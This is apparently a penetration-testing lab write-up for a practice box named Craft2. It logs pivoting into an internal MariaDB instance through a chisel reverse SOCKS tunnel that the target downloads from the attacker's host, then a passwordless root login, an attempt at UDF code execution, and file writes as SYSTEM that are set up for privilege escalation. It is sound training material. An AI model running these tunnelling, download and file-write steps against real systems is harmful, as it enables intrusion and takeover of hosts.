InfoSec LAB

Craft2_MySQL

Created: 3 min read

MySQL

An internal MySQL instance is running on the port 3306 on the CRAFT2 host. Given it’s running internally, tunneling is required to access it.

Tunneling

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ tail /etc/proxychains4.conf -n 2            
socks5 127.0.0.1 48823
#socks5 127.0.0.1 48824

Setting up a Socks5 proxy

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ chisel server -p 55555 --reverse --socks5 -v
2025/07/04 20:29:52 server: Reverse tunnelling enabled
2025/07/04 20:29:52 server: Fingerprint tFKGGDEHHZymqMmaZSG5/Ei63sR/3rzZ7/65KNNE9Jw=
2025/07/04 20:29:52 server: Listening on http://0.0.0.0:55555

Starting a chisel server on the Kali port 55555

PS C:\tmp> curl http://192.168.45.158/chiselx64.exe -OutFile .\chiselx64.exe
PS C:\tmp> Start-Job { & "C:\tmp\chiselx64.exe" client -v --fingerprint "tFKGGDEHHZymqMmaZSG5/Ei63sR/3rzZ7/65KNNE9Jw=" 192.168.45.158:55555 R:48823:socks }
 
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command                  
--     ----            -------------   -----         -----------     --------             -------                  
13     Job13           BackgroundJob   Running       True            localhost             & "C:\tmp\chiselx64.e...

Transferring & executing chisel on the CRAFT2 host.

Session established

Authentication

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ proxychains4 -q mysql -h 127.0.0.1 -uroot -p           
Enter password: 
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ proxychains4 -q mysql -h 127.0.0.1 -uroot --skip-ssl
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 16
Server version: 10.4.19-MariaDB mariadb.org binary distribution
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

Successfully authenticated as the root account. By default, the root account does not have a password.

Databases

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
5 rows in set (0.083 sec)

There is also the phpMyAdmin instance running. test DB is none default.

test DB

MariaDB [(none)]> SELECT * FROM information_schema.tables WHERE table_schema="test";
Empty set (0.023 sec)

The test DB is empty

mysql DB

MariaDB [(none)]> SELECT User,Password,Authentication_String FROM mys
ql.user;
+------+----------+-----------------------+
| User | Password | authentication_string |
+------+----------+-----------------------+
| root |          |                       |
| root |          |                       |
| root |          |                       |
| pma  |          |                       |
+------+----------+-----------------------+
4 rows in set (0.022 sec)

Empty

phpmyadmin DB

MariaDB [(none)]> SELECT * FROM phpmyadmin.pma__users;
Empty set (0.020 sec)

Empty

Execution (UDF)

MariaDB [(none)]> show variables like '%plugin%';
+-----------------+----------------------------+
| Variable_name   | Value                      |
+-----------------+----------------------------+
| plugin_dir      | C:\xampp\mysql\lib\plugin\ |
| plugin_maturity | gamma                      |
+-----------------+----------------------------+
2 rows in set (0.023 sec)
 
[...REDACTED...]
 
MariaDB [mysql]> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys_32.dll' (errno: 0, The specified module could not be found.
)

Additionally, loading a malicious UDF library is NOT possible

PS C:\tmp> ls C:\xampp\mysql\lib\plugin\
ls : Cannot find path 'C:\xampp\mysql\lib\plugin\' because it does not exist.
At line:1 char:1
+ ls C:\xampp\mysql\lib\plugin\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\xampp\mysql\lib\plugin\:String) [Get-ChildItem], ItemNotFoundExcepti 
   on
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

Because the C:\xampp\mysql\lib\plugin\ directory does not exist.

Read / Write

MariaDB [mysql]> SELECT 'hello' INTO OUTFILE 'C://tmp//test.txt';
Query OK, 1 row affected (0.022 sec)
 
MariaDB [mysql]> SELECT LOAD_FILE('C://tmp//test.txt');
+--------------------------------+
| LOAD_FILE('C://tmp//test.txt') |
+--------------------------------+
| hello
                         |
+--------------------------------+
1 row in set (0.022 sec)

Both read and write confirmed.

PS C:\tmp> icacls .\test.txt
.\test.txt NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Administrators:(I)(F)
           BUILTIN\Users:(I)(RX)
 
Successfully processed 1 files; Failed processing 0 files

It’s indeed owned by SYSTEM. Given that privileged file write as SYSTEM is possible, WerTrigger may be deployed for privilege escalation.

Interactive Graph View

Backlinks